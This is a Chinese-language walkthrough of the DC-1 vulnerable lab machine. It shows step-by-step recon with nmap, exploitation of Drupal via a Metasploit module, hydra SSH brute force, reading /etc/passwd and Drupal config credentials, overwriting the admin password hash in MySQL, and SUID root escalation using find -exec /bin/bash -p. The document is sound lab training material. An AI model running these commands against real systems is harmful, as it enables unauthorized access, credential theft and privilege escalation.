DC-1靶机渗透测试详细教程

​ 将DC-1靶机调成和kali同为桥接模式，因为DC-1的账号和密码还不知道，所以不能查看DC-1的IP地址，那么我们将通过kali来扫描到DC-1的IP地址。

1.使用命令 arp -scan -l 列出当前局域网的所有设备，在DC-1的网络适配器查看到的mac地址和扫描出来的192.168.160.26的mac地址一致。

arp -scan -l

**2.**使用nmap来扫描DC-1

nmap -A 192.168.160.26

从扫描结果可以看到有22和80端口，因为还不知道DC-1所使用的用户，所以还不能爆破ssh，先访问一下80端口网页。

**3.**访问到的web界面，发现需要账号密码登录，使用burp爆破没有结果。但是发现了CMS，尝试去msf的漏洞库搜索一下。

首先了解一下Drupal 它是开源CMS之一 Drupal是CMS内容管理系统并且备受青睐和关注 Drupal可以作为开源软件免费使用 就是附带了cms的php开发框架 使用度颇高

---

---

msf漏洞库启动方法

第一步： 启动postgresql数据库： service postgresql start；或者/etc/init.d/postgresql start；

service postgresql start

第二步：初始化MSF数据库：msfdb init；

sudo msfdb init

第三步：运行msfconsole：

msfconsole

第四步：在msf中查看数据库连接状态：db_status。

db_status

---

---

**4.**在msf漏洞库搜索Drupal,并攻击

启动msf的数据库

msfdb start

启动msfconsole

搜索 search Drupal

使用第二个漏洞

use 2

使用show missing查看一下必须要设置的选项

需要设置rhosts,就是设置靶机的IP地址

使用set设置

set rhosts 192.168.160.26

使用show options 可以查看设置好的信息

确定设置的信息没问题

输入run开始执行攻击，成功

flag1

ls可以看到第一个flag1.txt

第一个falg找到

5.查看一下靶机的用户，发现有个flag4的用户

cat /etc/passwd

6 使用hydra来爆破一波看看是否能拿到密码 (Hydra的使用教程)

hydra -l flag4 -P /usr/share/john/password.lst 192.168.160.26 ssh

得到falg4账号的密码为 orange

7.使用ssh连接靶机

ssh [email protected]

flag4

ls在flag4账户的目录下找到了falg4，可想而知还有在前面还有两个flag，可能在web上，因为web有账号

ls
cat flag4.txt

8.既然已经登录进靶机了，那么我们就去查看一下web的配置文件

进入到var/www的目录下

在百度上可以找到drupal的配置文件是

/var/www/sites/default/settings.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MtuaBySg-1691482431815)(DC-1.assets/image-20230722093836544.png)]

使用命令查看一下

cd / 
cd /var/www
cat sites/default/settings.php

在配置文件中看到了flag2还有数据库的信息

flag2

数据库的账号：dbuser 密码: R0ck3t

9. 使用命令连接数据库

mysql -u dbuser -p

连接成功

查看一下数据表

show databases;

使用数据表

use drupaldb;

查看表的数据

show tables;

注意到表里的users

使用命令查看一下

select * from users;

可以看到管理员的账户，但是先要搞hash值，有点难

quit退出数据库连接

10 .搜索一下*hash.sh

find / -name "*hash.sh"

可以看到var/www/scripts下有个sh的脚本

直接执行试试

scripts/password-hash.sh

可以设置密码，尝试一下后面加上密码

scripts/password-hash.sh jw123
#$S$DDJQnCUwMz0vMnJi5MKtGCoeyNWuEpDzZmYWxJm9g/G.gS6AE5ro

得到一个哈希值，那么我们可以将这个哈希值替换到数据库admin得账号下

11、 修改数据库中admin的哈希值

update drupaldb.users set pass='$S$DDJQnCUwMz0vMnJi5MKtGCoeyNWuEpDzZmYWxJm9g/G.gS6AE5ro' where name='admin'; 

修改成功尝试去web界面登录试试

flag3

找到flag3

12 .falg4提示我们提权

flag5

find -name flag4.txt -exec /bin/bash -p \;

/bin/bash -p：这是要执行的命令。/bin/bash 是一个常见的 Unix/Linux shell，而 -p 选项表示以特权（即以 root 用户）运行 bash。这将打开一个交互式 shell 环境，具有 root 用户权限。

查看权限：

whoami #打印当前有效的用户名称
id #显示用户的ID以及所属群组的ID

find -name flag4.txt -exec cat /root/thefinalflag.txt \;

DC-1总结

nmap的基础使用，信息收集

msf漏洞库搜索漏洞

使用漏洞攻击靶机拿到shell,找到第一个flag，查看/etc/passwd发现flag4用户

使用hydra爆破ssh登录的账号密码

登陆账号拿到第二个flag

查看到durpal的配置文件，获取到数据库信息，拿到第三个flag

尝试连接数据库，在数据库里发现admin账号，修改管理员的hash值

登录到web界面，拿到第四个flag

提权root拿到第五个flag

---

---

---

---

---

方式二

flag1

启动kali 查看本机地址

推测DC-1主机应该在同一网段 所以使用nmap扫扫看

扫到了四 台主机 2 254 26 10

其中可以看到 主机26和10的80端口处于open态 尝试一下

发现了一个CMS 很明显的信息 Drupal

First 先了解一下Drupal 它是开源CMS之一 Drupal是CMS内容管理系统并且备受青睐和关注 Drupal可以作为开源软件免费使用 就是附带了cms的php开发框架 使用度颇高

然后利用 MSF 攻克

先搜索一下可用的 drupal漏洞

这里我们使用第四个18年的这个 ：exploit/unix/webapp/drupal_drupalgeddon2

提前看一下参数 (options)

看到RHOSTS为空 需要我们来配置一下，并查看

其中 配完提前检查再run

完成后就可以利用这个漏洞了

发现了flag第一个文件

打开看看 再给我们下一关的提示 (每一个好的CMS都需要一个配置文件–你也是）

flag2

下一个攻克点提示我们在配置文件中

百度上找到drupal的配置文件的绝对路径是 /var/www/sites/default/settings.php

进入durpal 配置文件

逐层解剖 找到flag2文件 进行读取

还有意外收获 不仅得到了flag2 还得到了数据库的user password

flag3

查看3306是否开放 （netstat -anptl) 显示只允许本地连接

写进一个python进行交互

python -c "import pty;pty.spawn('/bin/bash')"

登录数据库 前面我们已经拿到了 user password

列出数据库

使用drupaldb库 查看里面的表 存在users表

查看users表

又得到了数据库的用户名和密码 但是password采用了特殊的加密方式 无法解密 换种思路 那我们就来替换它

在scripts录有password-hash.sh文件 是可以用该文件生成自己的密码hash值替换数据库hash达到登陆后台的目的 这里换成admin

紧接着替换原来的密码 先进库

替换原始密码的语句 update users set pass=‘$S$DBW9j2aCDzy4ErP.VhrfBpUwhfHOEwvjxLtfAOP69pV3CzJK3Hya’ where name=‘admin’

转去页面登录 得到flag3

flag4

cat /etc/passwd 发现了一个用户 flag4 白送人头

得到flag4

flag5

flag3提示 提权并提示 -exec 想到suid提权 find 命令

使用find命令查找有特殊权限suid的命令

find / -perm -4000 

使用find命令提权

 find ./ aaa -exec '/bin/sh' \;

得到flag5